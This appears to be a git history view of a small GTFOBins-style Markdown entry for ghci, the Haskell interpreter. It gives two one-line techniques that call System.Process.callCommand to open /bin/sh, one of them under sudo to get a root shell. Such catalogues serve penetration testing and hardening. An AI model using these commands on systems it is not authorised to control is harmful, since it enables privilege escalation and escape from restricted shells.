12 lines
181 B
Markdown
Raw Normal View History

2020-10-22 17:28:46 +01:00
---
functions:
shell:
- code: |
ghci
2020-10-24 12:43:55 +02:00
System.Process.callCommand "/bin/sh"
2020-10-22 17:28:46 +01:00
sudo:
- code: |
sudo ghci
2020-10-24 12:43:55 +02:00
System.Process.callCommand "/bin/sh"
2020-10-22 17:28:46 +01:00
---